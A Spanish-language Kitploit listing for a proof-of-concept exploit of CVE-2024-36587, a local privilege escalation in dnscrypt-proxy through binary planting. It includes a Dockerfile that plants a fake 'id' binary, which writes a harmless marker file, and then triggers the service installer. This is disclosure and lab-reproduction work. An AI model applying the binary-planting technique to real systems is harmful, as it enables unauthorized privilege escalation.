Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-36587 — Exploit de prueba de concepto para CVE-2024-36587 que demuestra una escalada de privilegios local en dnscrypt-proxy mediante plantación binaria, con entorno de reproducción basado en Docker. | Kitploit
Herramientas/GitHubGitHub/meeeeing/cve-2024-36587
Escalada de PrivilegiosSeguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónExplotación de Binarios
GitHubmeeeeing/cve-2024-36587

CVE-2024-36587

Exploit de prueba de concepto para CVE-2024-36587 que demuestra una escalada de privilegios local en dnscrypt-proxy mediante plantación binaria, con entorno de reproducción basado en Docker.

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-36587 - Escalada de Privilegios Local en dnscrypt-proxy

Resumen

  • Descripción de la vulnerabilidad: Debido a que el servicio dnscrypt-proxy confía en el ejecutable del directorio actual al registrarse, es posible insertar un binario malicioso para escalar privilegios.
  • Versiones afectadas: dnscrypt-proxy v2.0.0-alpha9 ~ v2.1.5
  • Método de PoC: Plantación de binarios (binary planting)

Configuración del entorno

root@kitploit:~
docker compose up --build

Una vez completados la compilación y la ejecución, se crea el contenedor.

Acceder al interior del contenedor:

root@kitploit:~
docker run -it --privileged dnscrypt-poc-poc bash

Activación de la vulnerabilidad

Dentro del contenedor:

root@kitploit:~
/tmp/id
cat /tmp/poc_was_here

Si se muestra Pwned_from_Docker, el PoC ha tenido éxito.

Archivos de configuración

Dockerfile

root@kitploit:~
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y \
    git \
    golang-go \
    sudo

WORKDIR /workspace

RUN git clone https://github.com/DNSCrypt/dnscrypt-proxy.git && \
    cd dnscrypt-proxy && \
    git checkout tags/2.1.0 && \
    go build -o proxy ./dnscrypt-proxy

RUN bash -c 'echo -e "#!/bin/bash\necho Pwned_from_Docker > /tmp/poc_was_here" > /tmp/id' && \
    chmod +x /tmp/id && \
    ln -sf /tmp/id /usr/local/bin/id

CMD ["./dnscrypt-proxy/proxy", "-service", "install"]

docker-compose.yaml

root@kitploit:~
version: "3.8"

services:
  poc:
    build: .
    container_name: dnscrypt-poc
    privileged: true
    tty: true

Referencias

  • https://github.com/DNSCrypt/dnscrypt-proxy
  • https://nvd.nist.gov/vuln/detail/CVE-2024-36587

Captura de pantalla del resultado

docker build success

Informe detallado

Para un análisis más detallado y los resultados, consulta el siguiente documento PDF:

PoC_Report_CVE-2024-36587.pdf

Descargar herramienta